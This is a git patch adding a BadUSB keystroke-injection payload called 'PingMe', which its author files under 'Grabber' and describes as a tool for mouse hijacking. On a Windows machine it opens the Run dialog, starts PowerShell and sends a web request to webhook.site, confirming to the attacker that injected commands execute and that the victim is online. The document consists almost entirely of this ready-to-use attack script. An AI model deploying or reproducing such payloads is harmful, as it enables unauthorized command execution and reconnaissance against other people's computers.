From 27678770322fbbc7ae8379fdf690b709b9d11bfe Mon Sep 17 00:00:00 2001 From: 7h30th3r0n3 <75809682+7h30th3r0n3@users.noreply.github.com> Date: Mon, 26 Sep 2022 21:58:36 +0200 Subject: [PATCH] Create PingMe.txt Designed to be used for mouse hijacking to find out if it is connected to the internet --- BadUSB/PingMe.txt | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 BadUSB/PingMe.txt diff --git a/BadUSB/PingMe.txt b/BadUSB/PingMe.txt new file mode 100644 index 00000000..07abb224 --- /dev/null +++ b/BadUSB/PingMe.txt @@ -0,0 +1,13 @@ +REM Title: PingMe +REM Author: 7h30th3r0n3 +REM Target: Windows 7/8/10/11 +REM Version: 1 +REM Category: Grabber +REM Designed to be used for mouse hijacking to find out if it is connected to the internet +GUI r +DELAY 400 +STRING powershell +ENTER +DELAY 400 +STRING Invoke-WebRequest -Uri https://webhook.site/ -Method GET;exit +ENTER